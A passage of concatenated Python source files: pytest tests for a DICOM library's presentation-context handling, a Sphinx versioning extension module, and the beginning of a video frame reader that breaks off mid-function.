setting supported_contexts to an empty list.""" context = build_context('1.2.840.10008.1.1') self.ae.supported_contexts = [context] assert len(self.ae.supported_contexts) == 1 self.ae.supported_contexts = [] assert len(self.ae.supported_contexts) == 0 def test_supported_contexts_setter_raises(self): """Test the AE.supported_contexts property raises if not context.""" with pytest.raises(ValueError): self.ae.supported_contexts = ['1.2.3'] def test_supported_contexts_sorted(self): """Test that the supported_contexts returns contexts in order.""" self.ae.add_supported_context('1.2.3.4') self.ae.add_supported_context('1.2.3.5') asyntaxes = [ cntx.abstract_syntax for cntx in self.ae.supported_contexts ] assert asyntaxes == ['1.2.3.4', '1.2.3.5'] self.ae.add_supported_context('0.1.2.3') self.ae.add_supported_context('2.1.2.3') asyntaxes = [ cntx.abstract_syntax for cntx in self.ae.supported_contexts ] assert asyntaxes == ['0.1.2.3', '1.2.3.4', '1.2.3.5', '2.1.2.3'] def test_supported_contexts_more_128(self): """Test setting supported_contexts with more than 128 contexts.""" contexts = [] for ii in range(300): contexts.append(build_context(str(ii))) self.ae.supported_contexts = contexts assert len(self.ae.supported_contexts) == 300 def test_remove_supported_context_str(self): """Tests for AE.remove_supported_context using str.""" self.ae.add_supported_context('1.2.840.10008.1.1') context = self.ae.supported_contexts[0] assert context.abstract_syntax == '1.2.840.10008.1.1' assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES self.ae.remove_supported_context('1.2.840.10008.1.1') assert len(self.ae.supported_contexts) == 0 # Test multiple self.ae.add_supported_context('1.2.840.10008.1.1') self.ae.add_supported_context('1.2.840.10008.1.4', ['1.2.3.4']) assert len(self.ae.supported_contexts) == 2 self.ae.remove_supported_context('1.2.840.10008.1.1') assert len(self.ae.supported_contexts) == 1 for context in self.ae.supported_contexts: assert context.abstract_syntax != '1.2.840.10008.1.1' def test_remove_supported_context_uid(self): """Tests for AE.remove_supported_context using UID.""" self.ae.add_supported_context('1.2.840.10008.1.1') context = self.ae.supported_contexts[0] assert context.abstract_syntax == '1.2.840.10008.1.1' assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES self.ae.remove_supported_context(UID('1.2.840.10008.1.1')) assert len(self.ae.supported_contexts) == 0 def test_remove_supported_context_sop_class(self): """Tests for AE.remove_supported_context using SOPClass.""" self.ae.add_supported_context(RTImageStorage) context = self.ae.supported_contexts[0] assert context.abstract_syntax == '1.2.840.10008.5.1.4.1.1.481.1' assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES self.ae.remove_supported_context(RTImageStorage) assert len(self.ae.supported_contexts) == 0 def test_remove_supported_context_default(self): """Tests for AE.remove_supported_context with default transfers.""" self.ae.add_supported_context('1.2.840.10008.1.1') context = self.ae.supported_contexts[0] assert context.abstract_syntax == '1.2.840.10008.1.1' assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES assert len(context.transfer_syntax) == 3 self.ae.remove_supported_context('1.2.840.10008.1.1') assert len(self.ae.supported_contexts) == 0 def test_remove_supported_context_single_transfer(self): """Tests for AE.remove_supported_context with single transfer.""" self.ae.add_supported_context('1.2.840.10008.1.1') context = self.ae.supported_contexts[0] assert context.abstract_syntax == '1.2.840.10008.1.1' assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES assert len(context.transfer_syntax) == 3 self.ae.remove_supported_context('1.2.840.10008.1.1', DEFAULT_TRANSFER_SYNTAXES[0]) context = self.ae.supported_contexts[0] assert context.abstract_syntax == '1.2.840.10008.1.1' assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES[1:] def test_remove_supported_context_partial(self): """Tests for AE.remove_supported_context with partial transfers.""" # Test singular self.ae.add_supported_context('1.2.840.10008.1.1') context = self.ae.supported_contexts[0] assert context.abstract_syntax == '1.2.840.10008.1.1' assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES assert len(context.transfer_syntax) == 3 self.ae.remove_supported_context('1.2.840.10008.1.1', ['1.2.840.10008.1.2']) assert len(self.ae.supported_contexts) == 1 context = self.ae.supported_contexts[0] assert len(context.transfer_syntax) == 2 assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES[1:] assert context.abstract_syntax == '1.2.840.10008.1.1' # Test multiple self.ae.add_supported_context('1.2.840.10008.1.1') self.ae.add_supported_context(RTImageStorage) self.ae.remove_supported_context('1.2.840.10008.1.1', ['1.2.840.10008.1.2']) assert len(self.ae.supported_contexts) == 2 context = self.ae.supported_contexts[0] assert len(context.transfer_syntax) == 2 assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES[1:] assert context.abstract_syntax == '1.2.840.10008.1.1' assert self.ae.supported_contexts[1].transfer_syntax == DEFAULT_TRANSFER_SYNTAXES def test_remove_supported_context_all(self): """Tests for AE.remove_supported_context with all transfers.""" self.ae.add_supported_context('1.2.840.10008.1.1') context = self.ae.supported_contexts[0] assert context.abstract_syntax == '1.2.840.10008.1.1' assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES assert len(context.transfer_syntax) == 3 # Test singular self.ae.remove_supported_context('1.2.840.10008.1.1', DEFAULT_TRANSFER_SYNTAXES) assert len(self.ae.supported_contexts) == 0 # Test multiple self.ae.add_supported_context('1.2.840.10008.1.1') self.ae.add_supported_context(RTImageStorage) self.ae.remove_supported_context('1.2.840.10008.1.1', DEFAULT_TRANSFER_SYNTAXES) context = self.ae.supported_contexts[0] assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES assert context.abstract_syntax == '1.2.840.10008.5.1.4.1.1.481.1' def test_remove_supported_context_all_plus(self): """Test remove_supported_context with extra transfers""" tsyntax = DEFAULT_TRANSFER_SYNTAXES[:] tsyntax.append('1.2.3') self.ae.add_supported_context('1.2.840.10008.1.1') context = self.ae.supported_contexts[0] assert context.abstract_syntax == '1.2.840.10008.1.1' assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES assert len(context.transfer_syntax) == 3 self.ae.remove_supported_context('1.2.840.10008.1.1', tsyntax) assert len(self.ae.supported_contexts) == 0 def test_scu_role(self): """Test add_supported_context with scu_role parameter.""" self.ae.add_supported_context('1.2.3') context = self.ae.supported_contexts[0] assert context.scu_role is None assert context.scp_role is None self.ae.supported_context = [] self.ae.add_supported_context('1.2.3', scu_role=None) context = self.ae.supported_contexts[0] assert context.scu_role is None assert context.scp_role is None self.ae.supported_context = [] self.ae.add_supported_context('1.2.3', scu_role=True) context = self.ae.supported_contexts[0] assert context.scu_role is True assert context.scp_role is None self.ae.supported_context = [] self.ae.add_supported_context('1.2.3', scu_role=False) context = self.ae.supported_contexts[0] assert context.scu_role is False assert context.scp_role is None def test_scu_role_update(self): """Test updating add_supported_context with scu_role parameter.""" self.ae.add_supported_context('1.2.3') context = self.ae.supported_contexts[0] assert context.scu_role is None assert context.scp_role is None self.ae.add_supported_context('1.2.3', scu_role=None) context = self.ae.supported_contexts[0] assert context.scu_role is None assert context.scp_role is None self.ae.add_supported_context('1.2.3', scu_role=True) context = self.ae.supported_contexts[0] assert context.scu_role is True assert context.scp_role is None self.ae.add_supported_context('1.2.3', scu_role=False) context = self.ae.supported_contexts[0] assert context.scu_role is False assert context.scp_role is None def test_scu_role_raises(self): """Test add_supported_context raises if scu_role wrong type.""" with pytest.raises(TypeError, match=""): self.ae.add_supported_context('1.2.3', scu_role='abc') assert self.ae.supported_contexts == [] def test_scp_role(self): """Test add_supported_context with scu_role parameter.""" self.ae.add_supported_context('1.2.3') context = self.ae.supported_contexts[0] assert context.scu_role is None assert context.scp_role is None self.ae.supported_context = [] self.ae.add_supported_context('1.2.3', scp_role=None) context = self.ae.supported_contexts[0] assert context.scu_role is None assert context.scp_role is None self.ae.supported_context = [] self.ae.add_supported_context('1.2.3', scp_role=True) context = self.ae.supported_contexts[0] assert context.scu_role is None assert context.scp_role is True self.ae.supported_context = [] self.ae.add_supported_context('1.2.3', scp_role=False) context = self.ae.supported_contexts[0] assert context.scu_role is None assert context.scp_role is False def test_scp_role_update(self): """Test updating add_supported_context with scp_role parameter.""" self.ae.add_supported_context('1.2.3') context = self.ae.supported_contexts[0] assert context.scu_role is None assert context.scp_role is None self.ae.add_supported_context('1.2.3', scp_role=None) context = self.ae.supported_contexts[0] assert context.scu_role is None assert context.scp_role is None self.ae.add_supported_context('1.2.3', scp_role=True) context = self.ae.supported_contexts[0] assert context.scu_role is None assert context.scp_role is True self.ae.add_supported_context('1.2.3', scp_role=False) context = self.ae.supported_contexts[0] assert context.scu_role is None assert context.scp_role is False def test_scp_role_raises(self): """Test add_supported_context raises if scp_role wrong type.""" with pytest.raises(TypeError, match=""): self.ae.add_supported_context('1.2.3', scp_role='abc') assert self.ae.supported_contexts == [] class TestAERequestedPresentationContexts(object): """Tests for AE's presentation contexts when acting as an SCU""" def setup(self): self.ae = AE() def test_add_requested_context_str(self): """Tests for AE.add_requested_context using str.""" self.ae.add_requested_context('1.2.840.10008.1.1') context = self.ae.requested_contexts[0] assert context.abstract_syntax == '1.2.840.10008.1.1' assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES assert context.context_id is None def test_add_requested_context_sop_class(self): """Tests for AE.add_requested_context using SOPClass.""" self.ae.add_requested_context(RTImageStorage) context = self.ae.requested_contexts[0] assert context.abstract_syntax == '1.2.840.10008.5.1.4.1.1.481.1' assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES def test_add_requested_context_uid(self): """Tests for AE.add_requested_context using UID.""" self.ae.add_requested_context(UID('1.2.840.10008.1.1')) context = self.ae.requested_contexts[0] assert context.abstract_syntax == '1.2.840.10008.1.1' assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES def test_add_requested_context_duplicate(self): """Test AE.add_requested_context using a duplicate UID.""" self.ae.add_requested_context(UID('1.2.840.10008.1.1')) self.ae.add_requested_context(UID('1.2.840.10008.1.1')) contexts = self.ae.requested_contexts assert len(contexts) == 2 assert contexts[0].abstract_syntax == '1.2.840.10008.1.1' assert contexts[0].transfer_syntax == DEFAULT_TRANSFER_SYNTAXES assert contexts[1].abstract_syntax == '1.2.840.10008.1.1' assert contexts[1].transfer_syntax == DEFAULT_TRANSFER_SYNTAXES def test_add_requested_context_duplicate_multi(self): """Tests for AE.add_requested_context using a duplicate UID.""" self.ae.add_requested_context('1.2.840.10008.1.1', [DEFAULT_TRANSFER_SYNTAXES[0]]) self.ae.add_requested_context('1.2.840.10008.1.1', DEFAULT_TRANSFER_SYNTAXES[1:]) contexts = self.ae.requested_contexts assert len(contexts) == 2 assert contexts[0].abstract_syntax == '1.2.840.10008.1.1' assert contexts[0].transfer_syntax == [DEFAULT_TRANSFER_SYNTAXES[0]] assert contexts[1].abstract_syntax == '1.2.840.10008.1.1' assert contexts[1].transfer_syntax == DEFAULT_TRANSFER_SYNTAXES[1:] def test_add_supported_context_transfer_single(self): """Test adding a single transfer syntax without a list""" self.ae.add_requested_context('1.2', '1.3') contexts = self.ae.requested_contexts assert len(contexts) == 1 assert contexts[0].abstract_syntax == '1.2' assert contexts[0].transfer_syntax == ['1.3'] self.ae.add_requested_context('1.2', UID('1.4')) contexts = self.ae.requested_contexts assert len(contexts) == 2 assert contexts[1].abstract_syntax == '1.2' assert contexts[1].transfer_syntax == ['1.4'] def test_add_requested_context_duplicate_transfer(self): """Test add_requested_context using duplicate transfer syntaxes""" self.ae.add_requested_context('1.2', ['1.3', '1.3']) contexts = self.ae.requested_contexts assert contexts[0].transfer_syntax == ['1.3'] def test_add_requested_context_private_abs(self): """Test AE.add_requested_context with a private abstract syntax""" self.ae.add_requested_context('1.2.3.4') contexts = self.ae.requested_contexts assert len(contexts) == 1 assert contexts[0].abstract_syntax == '1.2.3.4' assert contexts[0].transfer_syntax == DEFAULT_TRANSFER_SYNTAXES def test_add_requested_context_private_tran(self): """Test AE.add_requested_context with a private transfer syntax""" self.ae.add_requested_context('1.2.3.4', ['1.2.3', '1.2.840.10008.1.1']) contexts = self.ae.requested_contexts assert len(contexts) == 1 assert contexts[0].abstract_syntax == '1.2.3.4' assert contexts[0].transfer_syntax == ['1.2.3', '1.2.840.10008.1.1'] def test_add_requested_context_more_128_raises(self): """Test adding more than 128 presentation contexts""" for ii in range(128): self.ae.add_requested_context(str(ii)) assert len(self.ae.requested_contexts) == 128 with pytest.raises(ValueError): self.ae.add_requested_context('129') assert len(self.ae.requested_contexts) == 128 def test_requested_contexts_setter(self): """Test the AE.requested_contexts property setter.""" context = build_context('1.2.840.10008.1.1') self.ae.requested_contexts = [context] contexts = self.ae.requested_contexts assert len(contexts) == 1 assert context.abstract_syntax == '1.2.840.10008.1.1' assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES assert context.context_id is None def test_requested_contexts_empty(self): """Test the setting requested_contexts to an empty list.""" context = build_context('1.2.840.10008.1.1') self.ae.requested_contexts = [context] assert len(self.ae.requested_contexts) == 1 self.ae.requested_contexts = [] assert len(self.ae.requested_contexts) == 0 def test_requested_contexts_setter_raises(self): """Test the AE.requested_contexts property raises if not context.""" with pytest.raises(ValueError): self.ae.requested_contexts = ['1.2.3'] def test_requested_contexts_not_sorted(self): """Test that requested_contexts returns contexts in supplied order.""" self.ae.add_requested_context('1.2.3.4') self.ae.add_requested_context('1.2.3.5') asyntaxes = [ cntx.abstract_syntax for cntx in self.ae.requested_contexts ] assert asyntaxes == ['1.2.3.4', '1.2.3.5'] self.ae.add_requested_context('0.1.2.3') self.ae.add_requested_context('2.1.2.3') asyntaxes = [ cntx.abstract_syntax for cntx in self.ae.requested_contexts ] assert asyntaxes == ['1.2.3.4', '1.2.3.5', '0.1.2.3', '2.1.2.3'] def test_requested_contexts_more_128(self): """Test setting requested_contexts with more than 128 contexts.""" contexts = [] for ii in range(128): contexts.append(build_context(str(ii))) self.ae.requested_contexts = contexts assert len(self.ae.requested_contexts) == 128 contexts.append(build_context('129')) with pytest.raises(ValueError): self.ae.requested_contexts = contexts def test_remove_requested_context_str(self): """Tests for AE.remove_requested_context using str.""" # Test singular self.ae.add_requested_context('1.2.840.10008.1.1') context = self.ae.requested_contexts[0] assert context.abstract_syntax == '1.2.840.10008.1.1' assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES self.ae.remove_requested_context('1.2.840.10008.1.1') assert len(self.ae.requested_contexts) == 0 # Test multiple self.ae.add_requested_context('1.2.840.10008.1.1') self.ae.add_requested_context('1.2.840.10008.1.1', ['1.2.3.4']) self.ae.add_requested_context('1.2.840.10008.1.4', ['1.2.3.4']) assert len(self.ae.requested_contexts) == 3 self.ae.remove_requested_context('1.2.840.10008.1.1') assert len(self.ae.requested_contexts) == 1 for context in self.ae.requested_contexts: assert context.abstract_syntax != '1.2.840.10008.1.1' def test_remove_requested_context_uid(self): """Tests for AE.remove_requested_context using UID.""" self.ae.add_requested_context('1.2.840.10008.1.1') context = self.ae.requested_contexts[0] assert context.abstract_syntax == '1.2.840.10008.1.1' assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES self.ae.remove_requested_context(UID('1.2.840.10008.1.1')) assert len(self.ae.requested_contexts) == 0 def test_remove_requested_context_sop_class(self): """Tests for AE.remove_requested_context using SOPClass.""" self.ae.add_requested_context(RTImageStorage) context = self.ae.requested_contexts[0] assert context.abstract_syntax == '1.2.840.10008.5.1.4.1.1.481.1' assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES self.ae.remove_requested_context(RTImageStorage) assert len(self.ae.requested_contexts) == 0 def test_remove_requested_context_default(self): """Tests for AE.remove_requested_context with default transfers.""" self.ae.add_requested_context('1.2.840.10008.1.1') context = self.ae.requested_contexts[0] assert context.abstract_syntax == '1.2.840.10008.1.1' assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES assert len(context.transfer_syntax) == 3 self.ae.remove_requested_context('1.2.840.10008.1.1') assert len(self.ae.requested_contexts) == 0 def test_remove_requested_context_single(self): """Tests for AE.remove_requested_context with single transfer.""" self.ae.add_requested_context('1.2.840.10008.1.1') context = self.ae.requested_contexts[0] assert context.abstract_syntax == '1.2.840.10008.1.1' assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES assert len(context.transfer_syntax) == 3 self.ae.remove_requested_context('1.2.840.10008.1.1', DEFAULT_TRANSFER_SYNTAXES[0]) context = self.ae.requested_contexts[0] assert context.abstract_syntax == '1.2.840.10008.1.1' assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES[1:] def test_remove_requested_context_partial(self): """Tests for AE.remove_supported_context with partial transfers.""" # Test singular self.ae.add_requested_context('1.2.840.10008.1.1') context = self.ae.requested_contexts[0] assert context.abstract_syntax == '1.2.840.10008.1.1' assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES assert len(context.transfer_syntax) == 3 self.ae.remove_requested_context('1.2.840.10008.1.1', ['1.2.840.10008.1.2']) assert len(self.ae.requested_contexts) == 1 context = self.ae.requested_contexts[0] assert len(context.transfer_syntax) == 2 assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES[1:] assert context.abstract_syntax == '1.2.840.10008.1.1' self.ae.remove_requested_context('1.2.840.10008.1.1') assert len(self.ae.requested_contexts) == 0 # Test multiple self.ae.add_requested_context('1.2.840.10008.1.1') self.ae.add_requested_context(RTImageStorage) self.ae.add_requested_context('1.2.840.10008.1.1', ['1.2.3.4']) self.ae.remove_requested_context('1.2.840.10008.1.1', ['1.2.840.10008.1.2']) assert len(self.ae.requested_contexts) == 3 context = self.ae.requested_contexts[0] assert len(context.transfer_syntax) == 2 assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES[1:] assert context.abstract_syntax == '1.2.840.10008.1.1' assert self.ae.requested_contexts[1].transfer_syntax == DEFAULT_TRANSFER_SYNTAXES assert self.ae.requested_contexts[2].transfer_syntax == ['1.2.3.4'] assert self.ae.requested_contexts[2].abstract_syntax == '1.2.840.10008.1.1' self.ae.remove_requested_context('1.2.840.10008.1.1') assert len(self.ae.requested_contexts) == 1 assert self.ae.requested_contexts[0].abstract_syntax == '1.2.840.10008.5.1.4.1.1.481.1' def test_remove_requested_context_all(self): """Tests for AE.remove_requested_context with all transfers.""" self.ae.add_requested_context('1.2.840.10008.1.1') context = self.ae.requested_contexts[0] assert context.abstract_syntax == '1.2.840.10008.1.1' assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES assert len(context.transfer_syntax) == 3 # Test singular self.ae.remove_requested_context('1.2.840.10008.1.1', DEFAULT_TRANSFER_SYNTAXES) assert len(self.ae.requested_contexts) == 0 # Test multiple self.ae.add_requested_context('1.2.840.10008.1.1', [DEFAULT_TRANSFER_SYNTAXES[0]]) self.ae.add_requested_context('1.2.840.10008.1.1', DEFAULT_TRANSFER_SYNTAXES[1:]) self.ae.add_requested_context(RTImageStorage) self.ae.remove_requested_context('1.2.840.10008.1.1', DEFAULT_TRANSFER_SYNTAXES) assert len(self.ae.requested_contexts) == 1 context = self.ae.requested_contexts[0] assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES assert context.abstract_syntax == '1.2.840.10008.5.1.4.1.1.481.1' def test_remove_requested_context_all_plus(self): """Test remove_requested_context with extra transfers""" tsyntax = DEFAULT_TRANSFER_SYNTAXES[:] tsyntax.append('1.2.3') # Test singular self.ae.add_requested_context('1.2.840.10008.1.1') context = self.ae.requested_contexts[0] assert context.abstract_syntax == '1.2.840.10008.1.1' assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES assert len(context.transfer_syntax) == 3 self.ae.remove_requested_context('1.2.840.10008.1.1', tsyntax) assert len(self.ae.requested_contexts) == 0 # Test multiple self.ae.add_requested_context('1.2.840.10008.1.1', [DEFAULT_TRANSFER_SYNTAXES[0]]) self.ae.add_requested_context('1.2.840.10008.1.1', DEFAULT_TRANSFER_SYNTAXES[1:]) self.ae.add_requested_context(RTImageStorage) self.ae.remove_requested_context('1.2.840.10008.1.1', tsyntax) assert len(self.ae.requested_contexts) == 1 context = self.ae.requested_contexts[0] assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES assert context.abstract_syntax == '1.2.840.10008.5.1.4.1.1.481.1'
sphinx_.py
"""Interface with Sphinx.""" import datetime import logging import multiprocessing import os import sys from sphinx import application, build_main, locale from sphinx.builders.html import StandaloneHTMLBuilder from sphinx.config import Config as SphinxConfig from sphinx.errors import SphinxError from sphinx.jinja2glue import SphinxFileSystemLoader from sphinx.util.i18n import format_date from sphinxcontrib.versioning import __version__ from sphinxcontrib.versioning.lib import Config, HandledError, TempDir from sphinxcontrib.versioning.versions import Versions SC_VERSIONING_VERSIONS = list() # Updated after forking. STATIC_DIR = os.path.join(os.path.dirname(__file__), '_static') class EventHandlers(object): """Hold Sphinx event handlers as static or class methods. :ivar multiprocessing.queues.Queue ABORT_AFTER_READ: Communication channel to parent process. :ivar bool BANNER_GREATEST_TAG: Banner URLs point to greatest/highest (semver) tag. :ivar str BANNER_MAIN_VERSION: Banner URLs point to this remote name (from Versions.__getitem__()). :ivar bool BANNER_RECENT_TAG: Banner URLs point to most recently committed tag. :ivar str CURRENT_VERSION: Current version being built. :ivar bool IS_ROOT: Value for context['scv_is_root']. :ivar bool SHOW_BANNER: Display the banner. :ivar sphinxcontrib.versioning.versions.Versions VERSIONS: Versions class instance. """ ABORT_AFTER_READ = None BANNER_GREATEST_TAG = False BANNER_MAIN_VERSION = None BANNER_RECENT_TAG = False CURRENT_VERSION = None IS_ROOT = False SHOW_BANNER = False VERSIONS = None @staticmethod def builder_inited(app): """Update the Sphinx builder. :param sphinx.application.Sphinx app: Sphinx application object. """ # Add this extension's _templates directory to Sphinx. templates_dir = os.path.join(os.path.dirname(__file__), '_templates') app.builder.templates.pathchain.insert(0, templates_dir) app.builder.templates.loaders.insert(0, SphinxFileSystemLoader(templates_dir)) app.builder.templates.templatepathlen += 1 # Add versions.html to sidebar. if '**' not in app.config.html_sidebars: try: app.config.html_sidebars['**'] = StandaloneHTMLBuilder.default_sidebars + ['versions.html'] except AttributeError as e: app.config.html_sidebars['**'] = ['versions.html'] elif 'versions.html' not in app.config.html_sidebars['**']: app.config.html_sidebars['**'].append('versions.html') @classmethod def env_updated(cls, app, env): """Abort Sphinx after initializing config and discovering all pages to build. :param sphinx.application.Sphinx app: Sphinx application object. :param sphinx.environment.BuildEnvironment env: Sphinx build environment. """ if cls.ABORT_AFTER_READ: config = {n: getattr(app.config, n) for n in (a for a in dir(app.config) if a.startswith('scv_'))} config['found_docs'] = tuple(str(d) for d in env.found_docs) config['master_doc'] = str(app.config.master_doc) cls.ABORT_AFTER_READ.put(config) sys.exit(0) @classmethod def html_page_context(cls, app, pagename, templatename, context, doctree): """Update the Jinja2 HTML context, exposes the Versions class instance to it. :param sphinx.application.Sphinx app: Sphinx application object. :param str pagename: Name of the page being rendered (without .html or any file extension). :param str templatename: Page name with .html. :param dict context: Jinja2 HTML context. :param docutils.nodes.document doctree: Tree of docutils nodes. """ assert templatename or doctree # Unused, for linting. cls.VERSIONS.context = context versions = cls.VERSIONS this_remote = versions[cls.CURRENT_VERSION] banner_main_remote = versions[cls.BANNER_MAIN_VERSION] if cls.SHOW_BANNER else None # Update Jinja2 context. context['bitbucket_version'] = cls.CURRENT_VERSION context['current_version'] = cls.CURRENT_VERSION context['github_version'] = cls.CURRENT_VERSION context['html_theme'] = app.config.html_theme context['scv_banner_greatest_tag'] = cls.BANNER_GREATEST_TAG context['scv_banner_main_ref_is_branch'] = banner_main_remote['kind'] == 'heads' if cls.SHOW_BANNER else None context['scv_banner_main_ref_is_tag'] = banner_main_remote['kind'] == 'tags' if cls.SHOW_BANNER else None context['scv_banner_main_version'] = banner_main_remote['name'] if cls.SHOW_BANNER else None context['scv_banner_recent_tag'] = cls.BANNER_RECENT_TAG context['scv_is_branch'] = this_remote['kind'] == 'heads' context['scv_is_greatest_tag'] = this_remote == versions.greatest_tag_remote context['scv_is_recent_branch'] = this_remote == versions.recent_branch_remote context['scv_is_recent_ref'] = this_remote == versions.recent_remote context['scv_is_recent_tag'] = this_remote == versions.recent_tag_remote context['scv_is_root'] = cls.IS_ROOT context['scv_is_tag'] = this_remote['kind'] == 'tags' context['scv_show_banner'] = cls.SHOW_BANNER context['versions'] = versions context['vhasdoc'] = versions.vhasdoc context['vpathto'] = versions.vpathto # Insert banner into body. if cls.SHOW_BANNER and 'body' in context: parsed = app.builder.templates.render('banner.html', context) context['body'] = parsed + context['body'] # Handle overridden css_files. css_files = context.setdefault('css_files', list()) if '_static/banner.css' not in css_files: css_files.append('_static/banner.css') # Handle overridden html_static_path. if STATIC_DIR not in app.config.html_static_path: app.config.html_static_path.append(STATIC_DIR) # Reset last_updated with file's mtime (will be last git commit authored date). if app.config.html_last_updated_fmt is not None: file_path = app.env.doc2path(pagename) if os.path.isfile(file_path): lufmt = app.config.html_last_updated_fmt or getattr(locale, '_')('%b %d, %Y') mtime = datetime.datetime.fromtimestamp(os.path.getmtime(file_path)) context['last_updated'] = format_date(lufmt, mtime, language=app.config.language, warn=app.warn) def setup(app): """Called by Sphinx during phase 0 (initialization). :param sphinx.application.Sphinx app: Sphinx application object. :returns: Extension version. :rtype: dict """ # Used internally. For rebuilding all pages when one or versions fail. app.add_config_value('sphinxcontrib_versioning_versions', SC_VERSIONING_VERSIONS, 'html') # Needed for banner. app.config.html_static_path.append(STATIC_DIR) app.add_stylesheet('banner.css') # Tell Sphinx which config values can be set by the user. for name, default in Config(): app.add_config_value('scv_{}'.format(name), default, 'html') # Event handlers. app.connect('builder-inited', EventHandlers.builder_inited) app.connect('env-updated', EventHandlers.env_updated) app.connect('html-page-context', EventHandlers.html_page_context) return dict(version=__version__) class ConfigInject(SphinxConfig): """Inject this extension info self.extensions. Append after user's extensions.""" def __init__(self, dirname, filename, overrides, tags): """Constructor.""" super(ConfigInject, self).__init__(dirname, filename, overrides, tags) self.extensions.append('sphinxcontrib.versioning.sphinx_') def _build(argv, config, versions, current_name, is_root): """Build Sphinx docs via multiprocessing for isolation. :param tuple argv: Arguments to pass to Sphinx. :param sphinxcontrib.versioning.lib.Config config: Runtime configuration. :param sphinxcontrib.versioning.versions.Versions versions: Versions class instance. :param str current_name: The ref name of the current version being built. :param bool is_root: Is this build in the web root? """ # Patch. application.Config = ConfigInject if config.show_banner: EventHandlers.BANNER_GREATEST_TAG = config.banner_greatest_tag EventHandlers.BANNER_MAIN_VERSION = config.banner_main_ref EventHandlers.BANNER_RECENT_TAG = config.banner_recent_tag EventHandlers.SHOW_BANNER = True EventHandlers.CURRENT_VERSION = current_name EventHandlers.IS_ROOT = is_root EventHandlers.VERSIONS = versions SC_VERSIONING_VERSIONS[:] = [p for r in versions.remotes for p in sorted(r.items()) if p[0] not in ('sha', 'date')] # Update argv. if config.verbose > 1: argv += ('-v',) * (config.verbose - 1) if config.no_colors: argv += ('-N',) if config.overflow: argv += config.overflow # Build. result = build_main(argv) if result != 0: raise SphinxError def _read_config(argv, config, current_name, queue): """Read the Sphinx config via multiprocessing for isolation. :param tuple argv: Arguments to pass to Sphinx. :param sphinxcontrib.versioning.lib.Config config: Runtime configuration. :param str current_name: The ref name of the current version being built. :param multiprocessing.queues.Queue queue: Communication channel to parent process. """ # Patch. EventHandlers.ABORT_AFTER_READ = queue # Run. _build(argv, config, Versions(list()), current_name, False) def build(source, target, versions, current_name, is_root): """Build Sphinx docs for one version. Includes Versions class instance with names/urls in the HTML context. :raise HandledError: If sphinx-build fails. Will be logged before raising. :param str source: Source directory to pass to sphinx-build. :param str target: Destination directory to write documentation to (passed to sphinx-build). :param sphinxcontrib.versioning.versions.Versions versions: Versions class instance. :param str current_name: The ref name of the current version being built. :param bool is_root: Is this build in the web root? """ log = logging.getLogger(__name__) argv = ('sphinx-build', source, target) config = Config.from_context() log.debug('Running sphinx-build for %s with args: %s', current_name, str(argv)) child = multiprocessing.Process(target=_build, args=(argv, config, versions, current_name, is_root)) child.start() child.join() # Block. if child.exitcode != 0: log.error('sphinx-build failed for branch/tag: %s', current_name) raise HandledError def read_config(source, current_name): """Read the Sphinx config for one version. :raise HandledError: If sphinx-build fails. Will be logged before raising. :param str source: Source directory to pass to sphinx-build. :param str current_name: The ref name of the current version being built. :return: Specific Sphinx config values. :rtype: dict """ log = logging.getLogger(__name__) queue = multiprocessing.Queue() config = Config.from_context() with TempDir() as temp_dir: argv = ('sphinx-build', source, temp_dir) log.debug('Running sphinx-build for config values with args: %s', str(argv)) child = multiprocessing.Process(target=_read_config, args=(argv, config, current_name, queue)) child.start() child.join() # Block. if child.exitcode != 0: log.error('sphinx-build failed for branch/tag while reading config: %s', current_name) raise HandledError config = queue.get() return config
framereader.py
# pylint: skip-file import json import os import pickle import queue import struct import subprocess import tempfile import threading from functools import wraps import numpy as np from enum import IntEnum from lru import LRU import _io from tools.lib.cache import cache_path_for_file_path from tools.lib.exceptions import DataUnreadableError from tools.lib.file_helpers import atomic_write_in_dir try: from xx.chffr.lib.filereader import FileReader except ImportError: from tools.lib.filereader import FileReader HEVC_SLICE_B = 0 HEVC_SLICE_P = 1 HEVC_SLICE_I = 2 class GOPReader: def get_gop(self, num): # returns (start_frame_num, num_frames, frames_to_skip, gop_data) raise NotImplementedError class DoNothingContextManager: def __enter__(self): return self def __exit__(self, *x): pass class FrameType(IntEnum): raw = 1 h265_stream = 2 def fingerprint_video(fn): with FileReader(fn) as f: header = f.read(4) if len(header) == 0: raise DataUnreadableError("%s is empty" % fn) elif header == b"\x00\xc0\x12\x00": return FrameType.raw elif header == b"\x00\x00\x00\x01": if 'hevc' in fn: return FrameType.h265_stream else: raise NotImplementedError(fn) else: raise NotImplementedError(fn) def ffprobe(fn, fmt=None): cmd = ["ffprobe", "-v", "quiet", "-print_format", "json", "-show_format", "-show_streams"] if fmt: cmd += ["-f", fmt] cmd += [fn] try: ffprobe_output = subprocess.check_output(cmd) except subprocess.CalledProcessError: 